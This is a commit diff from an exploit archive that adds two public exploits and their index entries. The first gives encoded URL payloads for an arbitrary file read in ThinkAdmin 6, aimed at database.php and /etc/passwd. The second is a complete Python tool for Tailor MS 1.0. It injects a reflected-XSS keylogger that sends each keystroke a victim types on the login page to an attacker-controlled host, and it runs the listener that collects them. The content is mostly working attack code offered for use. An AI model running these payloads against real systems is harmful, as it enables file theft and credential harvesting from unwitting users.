DB: 2020-09-16

2 changes to exploits/shellcodes ThinkAdmin 6 - Arbitrarily File Read Tailor MS 1.0 - Reflected Cross-Site Scripting
2020-09-16 05:02:06 +00:00 · 2020-09-16 05:02:06 +00:00 · e23028b045
commit e23028b045
parent 903280c17b
3 changed files with 132 additions and 0 deletions
--- a/exploits/php/webapps/48812.txt
+++ b/exploits/php/webapps/48812.txt
@ -0,0 +1,16 @@
+# Exploit Title: ThinkAdmin 6 -  Arbitrarily File Read
+# Google Dork: N/A
+# Date: 2020-09-14
+# Exploit Author: Hzllaga
+# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
+# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
+# Version: v6 <= 2020.08.03.01
+# Tested on: PHP7.4.7,Apache
+# CVE : CVE-2020-25540
+
+PoC:
+On Windows read database.php payload:
+/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
+
+On Linux read /etc/passwd payload:
+/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
--- a/exploits/php/webapps/48813.txt
+++ b/exploits/php/webapps/48813.txt
@ -0,0 +1,114 @@
+# Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting
+# Exploit Author: Bobby Cooke (boku)  & Adeeb Shah (@hyd3sec)
+# Date: 2020-09-14
+# CVE ID: CVE-2020-23835
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro + XAMPP | Python 2.7
+# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
+# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS
+# CWE-523: Unprotected Transport of Credentials
+# CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6
+# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
+# Vulnerability Description: 
+# Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters Tailor Management System v1.0 allows remote attackers to harvest keys pressed via unauthenticated victim clicking malicious URL and typing.
+
+# Reflected XSS Key Logger
+
+import socket,sys,urllib,re
+from thread import *
+from colorama import Fore, Style
+
+
+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
+err  = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
+R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN
+
+def urlEncode(javascript):
+    return urllib.quote(javascript)
+
+def genXssPayload(LHOST,LPORT):
+    XSS_PAYLOAD  = '<script>'
+    XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {'
+    XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);'
+    XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;'
+    XSS_PAYLOAD += 'xhr.open("GET", uri, true);'
+    XSS_PAYLOAD += 'xhr.send();}'
+    XSS_PAYLOAD += '</script>'
+    return XSS_PAYLOAD
+
+def clientthread(conn):
+    try:
+        while True:
+            data = conn.recv(1024)
+            key = re.findall(r'KEY\=\w',data)
+            key = re.sub('KEY\=','',key[0])
+            print(printKey(key))
+            if not data:
+                break
+    except:
+        conn.close()
+
+def banner():
+    BANNER  = S[3]+C+' _______ _______ _______     _______ _______ _______     _______ _______ _______ _______ _______ _______ \n'
+    BANNER += C+'|\     /|\     /|\     /|   |\     /|\     /|\     /|   |\     /|\     /|\     /|\     /|\     /|\     /|\n'
+    BANNER += C+'| +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
+    BANNER += C+'| |   | | |   | | |   | |   | |   | | |   | | |   | |   | |   | | |   | | |   | | |   | | |   | | |   | |\n'
+    BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | |   | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | |   | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n'
+    BANNER += C+'| +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ |   | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
+    BANNER += C+'|/_____\|/_____\|/_____\|   |/_____\|/_____\|/_____\|   |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n'
+    BANNER += '                                          '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n'
+    return BANNER
+
+def printKey(key):
+    keyGen  = S[3]+C+'     _______\n' 
+    keyGen += C+'    |\     /|\n'
+    keyGen += C+'    | +---+ |\n'
+    keyGen += C+'    | |   | |\n'
+    keyGen += C+'    | | '+R+key+C+' | |\n'
+    keyGen += C+'    | +---+ |\n'
+    keyGen += C+'    |/_____\|'+F[0]+S[0]
+    return keyGen         
+
+def header():
+    head = S[1]+F[2]+'                         __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0]
+    return head
+
+def formatHelp(STRING):
+    return S[3]+F[2]+STRING+S[0]
+
+if __name__ == "__main__":
+    print(header())
+    print(banner())
+    if len(sys.argv) != 4:
+        print(ok+formatHelp(" Usage:   python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0]))
+        print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0]))
+        print(err+"Try Again..\r\n")
+        sys.exit(-1)
+    WEBAPP_URL = sys.argv[1]
+    LHOST = sys.argv[2]
+    LPORT = sys.argv[3]
+    if not re.match(r".*/$", WEBAPP_URL):
+        WEBAPP_URL = WEBAPP_URL+'/'
+    WEBAPP_URL = WEBAPP_URL+'index.php'
+    PAYLOAD = genXssPayload(LHOST,LPORT)
+    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
+    print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n')
+    print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n')
+    LPORT = int(LPORT)
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind((LHOST,LPORT))
+    print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0])
+    s.listen(100)
+    print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0])
+    try:
+        while 1:
+            conn, addr = s.accept()
+            start_new_thread(clientthread ,(conn,))
+    except:
+        s.close()
+        print('\r\n'+err+"Exiting Keylogger Credential Harvester..")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40636,6 +40636,8 @@ id,file,description,date,author,type,platform,port
 48807,exploits/hardware/webapps/48807.txt,"RAD SecFlow-1v SF_0290_2.3.01.26  - Persistent Cross-Site Scripting",2020-09-14,"Jonatan Schor",webapps,hardware,
 48809,exploits/hardware/webapps/48809.txt,"RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)",2020-09-14,"Jonatan Schor",webapps,hardware,
 48811,exploits/php/webapps/48811.txt,"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)",2020-09-14,"Mehmet Kelepçe",webapps,php,
+48812,exploits/php/webapps/48812.txt,"ThinkAdmin 6 -  Arbitrarily File Read",2020-09-15,Hzllaga,webapps,php,
+48813,exploits/php/webapps/48813.txt,"Tailor MS 1.0 - Reflected Cross-Site Scripting",2020-09-15,boku,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,